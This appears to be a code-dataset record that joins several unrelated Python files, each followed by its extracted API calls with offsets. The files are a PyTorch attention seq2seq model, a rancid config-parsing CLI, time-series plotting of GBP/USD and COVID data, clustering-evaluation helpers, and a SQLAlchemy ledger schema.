rnn_input = torch.cat((embedded_seqs, context_vectors), dim=2)
# rnn_input shape: [batch_size, 1, embed_dim + encoder_hidd_dim * 2]
# Step 2: feeding the input to the rnn and updating the decoder_h_t
decoder_output, decoder_h_t = self.rnn(rnn_input, decoder_h_t)
# decoder output shape: [batch_size, 1, num_dirs * hidd_dim]
# decoder_h_t shape: [num_layers * num_dirs, batch_size, hidd_dim]
# Step 3: updating the context vectors through attention
context_vectors, atten_scores = self.attention(keys=encoder_outputs,
query=decoder_h_t,
mask=attention_mask)
# Step 4: get the prediction vector
# embed trg gender info if needed
if self.gender_embedding_layer is not None:
embedded_trg_gender = self.gender_embedding_layer(trg_gender)
# embedded_trg_gender shape: [batch_size, gender_embed_dim]
# concatenating decoder_h_t, context_vectors, and the
# embedded_trg_gender to create a prediction vector
if self.rnn.num_layers == 1:
assert decoder_output.squeeze(1).eq(decoder_h_t.view(decoder_h_t.shape[1], -1)).all().item()
predictions_vector = torch.cat((decoder_h_t.view(decoder_h_t.shape[1], -1),
context_vectors, embedded_trg_gender,
embedded_seqs.squeeze(1)), dim=1)
# predictions_vector: [batch_size, hidd_dim + encoder_hidd_dim * 2 + gender_embed_dim]
else:
# concatenating decoder_h_t with context_vectors to
# create a prediction vector
predictions_vector = torch.cat((decoder_h_t.view(decoder_h_t.shape[1], -1),
context_vectors, embedded_seqs.squeeze(1)), dim=1)
# predictions_vector: [batch_size, hidd_dim + encoder_hidd_dim * 2]
# Step 5: feeding the prediction vector to the fc layer
# to a make a prediction
# apply dropout if needed
predictions_vector = self.dropout_layer(predictions_vector)
prediction = self.classification_layer(predictions_vector)
# prediction shape: [batch_size, output_dim]
return prediction, decoder_h_t, atten_scores, context_vectors
class Seq2Seq(nn.Module):
"""Seq2Seq model"""
def __init__(self, encoder_input_dim, encoder_embed_dim,
encoder_hidd_dim, encoder_num_layers,
decoder_input_dim, decoder_embed_dim,
decoder_hidd_dim, decoder_num_layers,
decoder_output_dim,
morph_embeddings=None, fasttext_embeddings=None,
gender_embeddings=None,
embed_trg_gender=False, gender_input_dim=0,
gender_embed_dim=0, char_src_padding_idx=0,
word_src_padding_idx=0, trg_padding_idx=0,
dropout=0, trg_sos_idx=2):
super(Seq2Seq, self).__init__()
self.encoder = Encoder(input_dim=encoder_input_dim,
char_embed_dim=encoder_embed_dim,
encoder_hidd_dim=encoder_hidd_dim,
decoder_hidd_dim=decoder_hidd_dim,
num_layers=encoder_num_layers,
morph_embeddings=morph_embeddings,
fasttext_embeddings=fasttext_embeddings,
char_padding_idx=char_src_padding_idx,
word_padding_idx=word_src_padding_idx,
dropout=dropout)
self.decoder = Decoder(input_dim=decoder_input_dim,
char_embed_dim=decoder_embed_dim,
decoder_hidd_dim=decoder_hidd_dim,
num_layers=decoder_num_layers,
encoder_hidd_dim=encoder_hidd_dim,
output_dim=decoder_input_dim,
padding_idx=trg_padding_idx,
embed_trg_gender=embed_trg_gender,
gender_input_dim=gender_input_dim,
gender_embed_dim=gender_embed_dim,
gender_embeddings=gender_embeddings,
dropout=dropout)
self.char_src_padding_idx = char_src_padding_idx
self.trg_sos_idx = trg_sos_idx
self.sampling_temperature = 3
def create_mask(self, src_seqs, src_padding_idx):
mask = (src_seqs != src_padding_idx)
return mask
def forward(self, char_src_seqs, word_src_seqs, src_seqs_lengths, trg_seqs,
trg_gender=None, teacher_forcing_prob=0.3):
# trg_seqs shape: [batch_size, trg_seqs_length]
# reshaping to: [trg_seqs_length, batch_size]
trg_seqs = trg_seqs.permute(1, 0)
trg_seqs_length, batch_size = trg_seqs.shape
# passing the src to the encoder
encoder_outputs, encoder_hidd = self.encoder(char_src_seqs, word_src_seqs, src_seqs_lengths)
# creating attention masks
attention_mask = self.create_mask(char_src_seqs, self.char_src_padding_idx)
predictions = []
decoder_attention_scores = []
# initializing the trg_seqs to <s> token
y_t = torch.ones(batch_size, dtype=torch.long) * self.trg_sos_idx
# intializing the context_vectors to zero
context_vectors = torch.zeros(batch_size, self.encoder.rnn.hidden_size * 2)
# context_vectors shape: [batch_size, encoder_hidd_dim * 2]
# initializing the hidden state of the decoder to the encoder hidden state
decoder_h_t = encoder_hidd
# decoder_h_t shape: [batch_size, decoder_hidd_dim]
# moving y_t and context_vectors to the right device
y_t = y_t.to(encoder_hidd.device)
context_vectors = context_vectors.to(encoder_hidd.device)
for i in range(0, trg_seqs_length):
teacher_forcing = np.random.random() < teacher_forcing_prob
# if teacher_forcing, use ground truth target tokens
# as an input to the decoder
if teacher_forcing:
y_t = trg_seqs[i]
# do a single decoder step
prediction, decoder_h_t, atten_scores, context_vectors = self.decoder(trg_seqs=y_t,
trg_gender=trg_gender,
encoder_outputs=encoder_outputs,
decoder_h_t=decoder_h_t,
context_vectors=context_vectors,
attention_mask=attention_mask)
# If not teacher force, use the maximum
# prediction as an input to the decoder in
# the next time step
if not teacher_forcing:
# we multiply the predictions with a sampling_temperature
# to make the probablities peakier, so we can be confident about the
# maximum prediction
pred_output_probs = F.softmax(prediction * self.sampling_temperature, dim=1)
y_t = torch.argmax(pred_output_probs, dim=1)
predictions.append(prediction)
decoder_attention_scores.append(atten_scores)
predictions = torch.stack(predictions)
# predictions shape: [trg_seq_len, batch_size, output_dim]
predictions = predictions.permute(1, 0, 2)
# predictions shape: [batch_size, trg_seq_len, output_dim]
decoder_attention_scores = torch.stack(decoder_attention_scores)
# attention_scores_total shape: [trg_seq_len, batch_size, src_seq_len]
decoder_attention_scores = decoder_attention_scores.permute(1, 0, 2)
# attention_scores_total shape: [batch_size, trg_seq_len, src_seq_len]
return predictions, decoder_attention_scores
| [
"torch.nn.functional.softmax",
"torch.nn.Dropout",
"torch.ones",
"numpy.random.random",
"torch.stack",
"attention.AdditiveAttention",
"torch.argmax",
"torch.cat",
"torch.nn.utils.rnn.pack_padded_sequence",
"torch.nn.Linear",
"torch.nn.Embedding.from_pretrained",
"torch.nn.utils.rnn.pad_packed_... | [((822, 891), 'torch.nn.Embedding', 'nn.Embedding', (['input_dim', 'char_embed_dim'], {'padding_idx': 'char_padding_idx'}), '(input_dim, char_embed_dim, padding_idx=char_padding_idx)\n', (834, 891), True, 'import torch.nn as nn\n'), ((1507, 1738), 'torch.nn.GRU', 'nn.GRU', ([], {'input_size': '(char_embed_dim + morph_embeddings_dim + fasttext_embeddings_dim)', 'hidden_size': 'encoder_hidd_dim', 'num_layers': 'num_layers', 'batch_first': '(True)', 'bidirectional': '(True)', 'dropout': '(dropout if num_layers > 1 else 0.0)'}), '(input_size=char_embed_dim + morph_embeddings_dim +\n fasttext_embeddings_dim, hidden_size=encoder_hidd_dim, num_layers=\n num_layers, batch_first=True, bidirectional=True, dropout=dropout if \n num_layers > 1 else 0.0)\n', (1513, 1738), True, 'import torch.nn as nn\n'), ((1882, 1931), 'torch.nn.Linear', 'nn.Linear', (['(encoder_hidd_dim * 2)', 'decoder_hidd_dim'], {}), '(encoder_hidd_dim * 2, decoder_hidd_dim)\n', (1891, 1931), True, 'import torch.nn as nn\n'), ((3197, 3268), 'torch.nn.utils.rnn.pack_padded_sequence', 'pack_padded_sequence', (['embedded_seqs', 'src_seqs_lengths'], {'batch_first': '(True)'}), '(embedded_seqs, src_seqs_lengths, batch_first=True)\n', (3217, 3268), False, 'from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n'), ((3815, 3860), 'torch.nn.utils.rnn.pad_packed_sequence', 'pad_packed_sequence', (['output'], {'batch_first': '(True)'}), '(output, batch_first=True)\n', (3834, 3860), False, 'from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n'), ((4843, 4935), 'attention.AdditiveAttention', 'AdditiveAttention', ([], {'encoder_hidd_dim': 'encoder_hidd_dim', 'decoder_hidd_dim': 'decoder_hidd_dim'}), '(encoder_hidd_dim=encoder_hidd_dim, decoder_hidd_dim=\n decoder_hidd_dim)\n', (4860, 4935), False, 'from attention import AdditiveAttention\n'), ((5334, 5398), 'torch.nn.Embedding', 'nn.Embedding', (['input_dim', 'char_embed_dim'], {'padding_idx': 'padding_idx'}), '(input_dim, char_embed_dim, padding_idx=padding_idx)\n', (5346, 5398), True, 'import torch.nn as nn\n'), ((5612, 5793), 'torch.nn.GRU', 'nn.GRU', ([], {'input_size': '(char_embed_dim + encoder_hidd_dim * 2)', 'hidden_size': 'decoder_hidd_dim', 'num_layers': 'num_layers', 'batch_first': '(True)', 'dropout': '(dropout if num_layers > 1 else 0.0)'}), '(input_size=char_embed_dim + encoder_hidd_dim * 2, hidden_size=\n decoder_hidd_dim, num_layers=num_layers, batch_first=True, dropout=\n dropout if num_layers > 1 else 0.0)\n', (5618, 5793), True, 'import torch.nn as nn\n'), ((6024, 6139), 'torch.nn.Linear', 'nn.Linear', (['(encoder_hidd_dim * 2 + decoder_hidd_dim * num_layers + gender_embed_dim +\n char_embed_dim)', 'output_dim'], {}), '(encoder_hidd_dim * 2 + decoder_hidd_dim * num_layers +\n gender_embed_dim + char_embed_dim, output_dim)\n', (6033, 6139), True, 'import torch.nn as nn\n'), ((6258, 6277), 'torch.nn.Dropout', 'nn.Dropout', (['dropout'], {}), '(dropout)\n', (6268, 6277), True, 'import torch.nn as nn\n'), ((7020, 7070), 'torch.cat', 'torch.cat', (['(embedded_seqs, context_vectors)'], {'dim': '(2)'}), '((embedded_seqs, context_vectors), dim=2)\n', (7029, 7070), False, 'import torch\n'), ((12639, 12696), 'torch.zeros', 'torch.zeros', (['batch_size', '(self.encoder.rnn.hidden_size * 2)'], {}), '(batch_size, self.encoder.rnn.hidden_size * 2)\n', (12650, 12696), False, 'import torch\n'), ((14750, 14774), 'torch.stack', 'torch.stack', (['predictions'], {}), '(predictions)\n', (14761, 14774), False, 'import torch\n'), ((14996, 15033), 'torch.stack', 'torch.stack', (['decoder_attention_scores'], {}), '(decoder_attention_scores)\n', (15007, 15033), False, 'import torch\n'), ((1073, 1149), 'torch.nn.Embedding.from_pretrained', 'nn.Embedding.from_pretrained', (['morph_embeddings'], {'padding_idx': 'word_padding_idx'}), '(morph_embeddings, padding_idx=word_padding_idx)\n', (1101, 1149), True, 'import torch.nn as nn\n'), ((1370, 1419), 'torch.nn.Embedding.from_pretrained', 'nn.Embedding.from_pretrained', (['fasttext_embeddings'], {}), '(fasttext_embeddings)\n', (1398, 1419), True, 'import torch.nn as nn\n'), ((2471, 2530), 'torch.cat', 'torch.cat', (['(embedded_seqs, embedded_word_seqs_morph)'], {'dim': '(2)'}), '((embedded_seqs, embedded_word_seqs_morph), dim=2)\n', (2480, 2530), False, 'import torch\n'), ((2965, 3021), 'torch.cat', 'torch.cat', (['(embedded_seqs, embedded_word_seqs_ft)'], {'dim': '(2)'}), '((embedded_seqs, embedded_word_seqs_ft), dim=2)\n', (2974, 3021), False, 'import torch\n'), ((12502, 12542), 'torch.ones', 'torch.ones', (['batch_size'], {'dtype': 'torch.long'}), '(batch_size, dtype=torch.long)\n', (12512, 12542), False, 'import torch\n'), ((5136, 5184), 'torch.nn.Embedding', 'nn.Embedding', (['gender_input_dim', 'gender_embed_dim'], {}), '(gender_input_dim, gender_embed_dim)\n', (5148, 5184), True, 'import torch.nn as nn\n'), ((5249, 5296), 'torch.nn.Embedding.from_pretrained', 'nn.Embedding.from_pretrained', (['gender_embeddings'], {}), '(gender_embeddings)\n', (5277, 5296), True, 'import torch.nn as nn\n'), ((13190, 13208), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (13206, 13208), True, 'import numpy as np\n'), ((14507, 14563), 'torch.nn.functional.softmax', 'F.softmax', (['(prediction * self.sampling_temperature)'], {'dim': '(1)'}), '(prediction * self.sampling_temperature, dim=1)\n', (14516, 14563), True, 'import torch.nn.functional as F\n'), ((14586, 14624), 'torch.argmax', 'torch.argmax', (['pred_output_probs'], {'dim': '(1)'}), '(pred_output_probs, dim=1)\n', (14598, 14624), False, 'import torch\n')] |
"""CLI entry points of faddr."""
import argparse
import pathlib
import sys
from faddr import logger
from faddr.config import load_config
from faddr.rancid import RancidDir
from faddr.database import Database
def parse_args_db():
"""Parsing CMD keys."""
parser = argparse.ArgumentParser(argument_default=argparse.SUPPRESS)
parser.add_argument(
"-c",
"--confguration-file",
help="Faddr file configuration location",
)
parser.add_argument(
"-r",
"--rancid-dir",
help="Rancid basedir location",
)
parser.add_argument(
"-g",
"--rancid-groups",
help="Rancid groups to parse, separated by coma(,)",
)
parser.add_argument(
"-d",
"--database-dir",
help="Database dir location",
)
parser.add_argument(
"-f",
"--database-file",
help="Database file name",
)
args = parser.parse_args()
return vars(args)
def faddr_db():
"""Parsing devices' config files and writing data to database."""
args = parse_args_db()
logger.debug(f"Arguments from CMD: {args}")
config = load_config(cmd_args=args)
rancid = RancidDir(config.rancid.dir)
database = Database(
pathlib.Path(config.database.dir) / pathlib.Path(config.database.file)
)
if not rancid.is_valid():
error = (
f'"{config.rancid.dir}" is not a valid rancid BASEDIR '
"or was not properly initialised with rancid-csv utility"
)
logger.error(error)
sys.exit(1)
# Get groups list found in rancid's base dir
groups = ("group1", "group2")
logger.debug(f"Found rancid groups: {groups}")
for group in groups:
logger.debug(f"Parsing devices in group {group}")
data = rancid.parse_configs(group)
if len(data) > 0:
database.insert(data)
| [
"argparse.ArgumentParser",
"pathlib.Path",
"faddr.logger.error",
"faddr.logger.debug",
"sys.exit",
"faddr.config.load_config",
"faddr.rancid.RancidDir"
] | [((274, 333), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'argument_default': 'argparse.SUPPRESS'}), '(argument_default=argparse.SUPPRESS)\n', (297, 333), False, 'import argparse\n'), ((1095, 1138), 'faddr.logger.debug', 'logger.debug', (['f"""Arguments from CMD: {args}"""'], {}), "(f'Arguments from CMD: {args}')\n", (1107, 1138), False, 'from faddr import logger\n'), ((1153, 1179), 'faddr.config.load_config', 'load_config', ([], {'cmd_args': 'args'}), '(cmd_args=args)\n', (1164, 1179), False, 'from faddr.config import load_config\n'), ((1194, 1222), 'faddr.rancid.RancidDir', 'RancidDir', (['config.rancid.dir'], {}), '(config.rancid.dir)\n', (1203, 1222), False, 'from faddr.rancid import RancidDir\n'), ((1667, 1713), 'faddr.logger.debug', 'logger.debug', (['f"""Found rancid groups: {groups}"""'], {}), "(f'Found rancid groups: {groups}')\n", (1679, 1713), False, 'from faddr import logger\n'), ((1539, 1558), 'faddr.logger.error', 'logger.error', (['error'], {}), '(error)\n', (1551, 1558), False, 'from faddr import logger\n'), ((1567, 1578), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (1575, 1578), False, 'import sys\n'), ((1748, 1797), 'faddr.logger.debug', 'logger.debug', (['f"""Parsing devices in group {group}"""'], {}), "(f'Parsing devices in group {group}')\n", (1760, 1797), False, 'from faddr import logger\n'), ((1257, 1290), 'pathlib.Path', 'pathlib.Path', (['config.database.dir'], {}), '(config.database.dir)\n', (1269, 1290), False, 'import pathlib\n'), ((1293, 1327), 'pathlib.Path', 'pathlib.Path', (['config.database.file'], {}), '(config.database.file)\n', (1305, 1327), False, 'import pathlib\n')] |
import pandas as pd
from matplotlib import dates as mdates
from timeseries import plot_ts
from timeseries.plotting import ax_settings
def main():
# .csv available to download at:
# https://www.investing.com/currencies/gbp-usd-historical-data
gpd_usd_data = pd.read_csv("../data/GBP_USD Historical Data_monthly.csv")
gpd_usd_data["Change %"] = gpd_usd_data["Change %"].apply(
lambda s: float(s[:-1]))
gpd_usd_data["Date"] = pd.to_datetime(gpd_usd_data.Date, format="%b %y")
gpd_usd_data = gpd_usd_data.reindex(
index=gpd_usd_data.index[::-1]).set_index(
gpd_usd_data.index
)
gpd_usd_data
plot_ts(
gpd_usd_data["Change %"],
index_values=gpd_usd_data.Date,
name="GPB in USD",
title="GPB/USD Exchange Rates",
).show()
plot_ts(
[gpd_usd_data.Price, gpd_usd_data["Change %"]],
index=range(100),
index_values=gpd_usd_data.Date[range(100)],
title="GPB/USD Exchange Rates",
round_dates="Y",
color="darkred",
major_xticks_loc=mdates.YearLocator(base=1),
date_fmt=mdates.DateFormatter("%Y"),
).show()
plot_ts(
gpd_usd_data["Change %"],
index=gpd_usd_data.Date,
name="GPB in USD",
title="GPB/USD Exchange Rates",
engine="plotly",
# legend_pos="bottom",
legend_pos="top",
).show()
plot_ts(
[gpd_usd_data.Price, gpd_usd_data["Change %"]],
index=range(200),
index_values=gpd_usd_data.Date[range(200)],
title="GPB/USD Exchange Rates",
).show()
plot_ts(
[gpd_usd_data.Price, gpd_usd_data["Change %"]],
index=gpd_usd_data.Date[range(200)],
title="GPB/USD Exchange Rates",
engine="plotly",
).show()
plot_ts(
gpd_usd_data[["Price", "Change %"]],
index=gpd_usd_data.Date[range(100)],
title="GPB/USD Exchange Rates",
name="GPB in USD",
color="darkred",
engine="plotly",
showlegend=True,
).show()
# COVID
# .csv available to download at:
# https://ourworldindata.org/explorers/coronavirus-data-explorer
covid_data = pd.read_csv("../data/covid-data.csv")
covid_data["date"] = pd.to_datetime(covid_data["date"], format="%Y-%m-%d")
covid_data.set_index("date", inplace=True)
covid_data.sort_index(ascending=True, inplace=True)
loc = "Argentina"
ts = covid_data[covid_data.location == loc]["new_cases"]
ts = ts[~ts.isnull()]
ts = ts[~(ts == 0)]
fig = plot_ts(ts, title=f"Covid-19 {loc}", color="tab:blue")
ax_settings(fig=fig, yscale="log")
fig.show()
if __name__ == "__main__":
main()
| [
"pandas.read_csv",
"matplotlib.dates.DateFormatter",
"timeseries.plotting.ax_settings",
"timeseries.plot_ts",
"matplotlib.dates.YearLocator",
"pandas.to_datetime"
] | [((272, 330), 'pandas.read_csv', 'pd.read_csv', (['"""../data/GBP_USD Historical Data_monthly.csv"""'], {}), "('../data/GBP_USD Historical Data_monthly.csv')\n", (283, 330), True, 'import pandas as pd\n'), ((454, 503), 'pandas.to_datetime', 'pd.to_datetime', (['gpd_usd_data.Date'], {'format': '"""%b %y"""'}), "(gpd_usd_data.Date, format='%b %y')\n", (468, 503), True, 'import pandas as pd\n'), ((2199, 2236), 'pandas.read_csv', 'pd.read_csv', (['"""../data/covid-data.csv"""'], {}), "('../data/covid-data.csv')\n", (2210, 2236), True, 'import pandas as pd\n'), ((2262, 2315), 'pandas.to_datetime', 'pd.to_datetime', (["covid_data['date']"], {'format': '"""%Y-%m-%d"""'}), "(covid_data['date'], format='%Y-%m-%d')\n", (2276, 2315), True, 'import pandas as pd\n'), ((2564, 2618), 'timeseries.plot_ts', 'plot_ts', (['ts'], {'title': 'f"""Covid-19 {loc}"""', 'color': '"""tab:blue"""'}), "(ts, title=f'Covid-19 {loc}', color='tab:blue')\n", (2571, 2618), False, 'from timeseries import plot_ts\n'), ((2623, 2657), 'timeseries.plotting.ax_settings', 'ax_settings', ([], {'fig': 'fig', 'yscale': '"""log"""'}), "(fig=fig, yscale='log')\n", (2634, 2657), False, 'from timeseries.plotting import ax_settings\n'), ((651, 772), 'timeseries.plot_ts', 'plot_ts', (["gpd_usd_data['Change %']"], {'index_values': 'gpd_usd_data.Date', 'name': '"""GPB in USD"""', 'title': '"""GPB/USD Exchange Rates"""'}), "(gpd_usd_data['Change %'], index_values=gpd_usd_data.Date, name=\n 'GPB in USD', title='GPB/USD Exchange Rates')\n", (658, 772), False, 'from timeseries import plot_ts\n'), ((1168, 1321), 'timeseries.plot_ts', 'plot_ts', (["gpd_usd_data['Change %']"], {'index': 'gpd_usd_data.Date', 'name': '"""GPB in USD"""', 'title': '"""GPB/USD Exchange Rates"""', 'engine': '"""plotly"""', 'legend_pos': '"""top"""'}), "(gpd_usd_data['Change %'], index=gpd_usd_data.Date, name=\n 'GPB in USD', title='GPB/USD Exchange Rates', engine='plotly',\n legend_pos='top')\n", (1175, 1321), False, 'from timeseries import plot_ts\n'), ((1077, 1103), 'matplotlib.dates.YearLocator', 'mdates.YearLocator', ([], {'base': '(1)'}), '(base=1)\n', (1095, 1103), True, 'from matplotlib import dates as mdates\n'), ((1122, 1148), 'matplotlib.dates.DateFormatter', 'mdates.DateFormatter', (['"""%Y"""'], {}), "('%Y')\n", (1142, 1148), True, 'from matplotlib import dates as mdates\n')] |
from sklearn import metrics
from prettytable import PrettyTable
def evaluate_clustering(name, X, true_labels, pred_labels):
homogeneity = metrics.homogeneity_score(true_labels, pred_labels)
completeness = metrics.completeness_score(true_labels, pred_labels)
v_measure = metrics.v_measure_score(true_labels, pred_labels)
adj_rand_score = metrics.adjusted_rand_score(true_labels, pred_labels)
norm_mutual_score = metrics.normalized_mutual_info_score(true_labels, pred_labels)
fowlkes_m = metrics.fowlkes_mallows_score(true_labels, pred_labels)
#silhouette = metrics.silhouette_score(X, pred_labels, metric='euclidean')
return [name, "{:.2f}".format(homogeneity), "{:.2f}".format(completeness), "{:.2f}".format(v_measure), "{:.2f}".format(adj_rand_score), "{:.2f}".format(norm_mutual_score), "{:.2f}".format(fowlkes_m)]
def tabulate_results(results):
t = PrettyTable(['Name', 'Homogeneity', 'Completeness', 'V Measure', 'Adj Rand Score', 'Norm Mutual Score', 'Fowlkes Mallows'])
for result in results:
t.add_row(result)
print(t)
def tab_results(header, results):
t = PrettyTable(header)
for result in results:
t.add_row(result)
print(t)
def evaluate_vmeasure(true_labels, pred_labels):
return metrics.v_measure_score(true_labels, pred_labels)
def evaluate_fm(true_labels, pred_labels):
return metrics.fowlkes_mallows_score(true_labels, pred_labels) | [
"prettytable.PrettyTable",
"sklearn.metrics.homogeneity_score",
"sklearn.metrics.adjusted_rand_score",
"sklearn.metrics.completeness_score",
"sklearn.metrics.v_measure_score",
"sklearn.metrics.fowlkes_mallows_score",
"sklearn.metrics.normalized_mutual_info_score"
] | [((144, 195), 'sklearn.metrics.homogeneity_score', 'metrics.homogeneity_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (169, 195), False, 'from sklearn import metrics\n'), ((215, 267), 'sklearn.metrics.completeness_score', 'metrics.completeness_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (241, 267), False, 'from sklearn import metrics\n'), ((284, 333), 'sklearn.metrics.v_measure_score', 'metrics.v_measure_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (307, 333), False, 'from sklearn import metrics\n'), ((360, 413), 'sklearn.metrics.adjusted_rand_score', 'metrics.adjusted_rand_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (387, 413), False, 'from sklearn import metrics\n'), ((438, 500), 'sklearn.metrics.normalized_mutual_info_score', 'metrics.normalized_mutual_info_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (474, 500), False, 'from sklearn import metrics\n'), ((522, 577), 'sklearn.metrics.fowlkes_mallows_score', 'metrics.fowlkes_mallows_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (551, 577), False, 'from sklearn import metrics\n'), ((907, 1034), 'prettytable.PrettyTable', 'PrettyTable', (["['Name', 'Homogeneity', 'Completeness', 'V Measure', 'Adj Rand Score',\n 'Norm Mutual Score', 'Fowlkes Mallows']"], {}), "(['Name', 'Homogeneity', 'Completeness', 'V Measure',\n 'Adj Rand Score', 'Norm Mutual Score', 'Fowlkes Mallows'])\n", (918, 1034), False, 'from prettytable import PrettyTable\n'), ((1149, 1168), 'prettytable.PrettyTable', 'PrettyTable', (['header'], {}), '(header)\n', (1160, 1168), False, 'from prettytable import PrettyTable\n'), ((1305, 1354), 'sklearn.metrics.v_measure_score', 'metrics.v_measure_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (1328, 1354), False, 'from sklearn import metrics\n'), ((1414, 1469), 'sklearn.metrics.fowlkes_mallows_score', 'metrics.fowlkes_mallows_score', (['true_labels', 'pred_labels'], {}), '(true_labels, pred_labels)\n', (1443, 1469), False, 'from sklearn import metrics\n')] |
import os
import pymysql
from dotenv import load_dotenv
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import Column, BigInteger, String, Float, ForeignKey
def load_engine():
"""Create the database engine"""
load_dotenv()
DB_UNAME = os.environ["DB_UNAME"]
DB_PWORD = os.environ["DB_PWORD"]
DB_HOST = os.environ["DB_HOST"]
DB_NAME = os.environ["DB_NAME"]
engine = create_engine(f'mysql+pymysql://{DB_UNAME}:{DB_PWORD}@{DB_HOST}/{DB_NAME}')
return engine
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(BigInteger, primary_key=True, nullable=False)
name = Column(String(32), unique=True)
password = Column(String(32))
transaction = relationship("Ledger")
def __repr__(self):
return "<User(name={}, password={}>".format(self.name, self.password)
class Ledger(Base):
__tablename__ = 'ledger'
# TODO: add standardized columns based on coinbase csv
id = Column(BigInteger, primary_key=True, nullable=False)
source = Column(String(20))
asset = Column(String(20))
txn_type = Column(String(20))
amount = Column(Float)
price_at_txn = Column(Float)
user_id = Column(BigInteger, ForeignKey('user.id'), nullable=False)
def __repr__(self):
return "<Ledger(asset={}, amount={}, user_id={})>".format(self.asset, self.amount,self.user_id)
if __name__ == "__main__":
engine = load_engine()
Base.metadata.create_all(engine)
| [
"sqlalchemy.orm.relationship",
"sqlalchemy.create_engine",
"sqlalchemy.ForeignKey",
"dotenv.load_dotenv",
"sqlalchemy.String",
"sqlalchemy.ext.declarative.declarative_base",
"sqlalchemy.Column"
] | [((609, 627), 'sqlalchemy.ext.declarative.declarative_base', 'declarative_base', ([], {}), '()\n', (625, 627), False, 'from sqlalchemy.ext.declarative import declarative_base\n'), ((321, 334), 'dotenv.load_dotenv', 'load_dotenv', ([], {}), '()\n', (332, 334), False, 'from dotenv import load_dotenv\n'), ((506, 581), 'sqlalchemy.create_engine', 'create_engine', (['f"""mysql+pymysql://{DB_UNAME}:{DB_PWORD}@{DB_HOST}/{DB_NAME}"""'], {}), "(f'mysql+pymysql://{DB_UNAME}:{DB_PWORD}@{DB_HOST}/{DB_NAME}')\n", (519, 581), False, 'from sqlalchemy import create_engine\n'), ((684, 736), 'sqlalchemy.Column', 'Column', (['BigInteger'], {'primary_key': '(True)', 'nullable': '(False)'}), '(BigInteger, primary_key=True, nullable=False)\n', (690, 736), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((832, 854), 'sqlalchemy.orm.relationship', 'relationship', (['"""Ledger"""'], {}), "('Ledger')\n", (844, 854), False, 'from sqlalchemy.orm import relationship\n'), ((1081, 1133), 'sqlalchemy.Column', 'Column', (['BigInteger'], {'primary_key': '(True)', 'nullable': '(False)'}), '(BigInteger, primary_key=True, nullable=False)\n', (1087, 1133), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((1244, 1257), 'sqlalchemy.Column', 'Column', (['Float'], {}), '(Float)\n', (1250, 1257), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((1277, 1290), 'sqlalchemy.Column', 'Column', (['Float'], {}), '(Float)\n', (1283, 1290), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((755, 765), 'sqlalchemy.String', 'String', (['(32)'], {}), '(32)\n', (761, 765), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((802, 812), 'sqlalchemy.String', 'String', (['(32)'], {}), '(32)\n', (808, 812), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((1154, 1164), 'sqlalchemy.String', 'String', (['(20)'], {}), '(20)\n', (1160, 1164), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((1185, 1195), 'sqlalchemy.String', 'String', (['(20)'], {}), '(20)\n', (1191, 1195), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((1219, 1229), 'sqlalchemy.String', 'String', (['(20)'], {}), '(20)\n', (1225, 1229), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n'), ((1324, 1345), 'sqlalchemy.ForeignKey', 'ForeignKey', (['"""user.id"""'], {}), "('user.id')\n", (1334, 1345), False, 'from sqlalchemy import Column, BigInteger, String, Float, ForeignKey\n')] |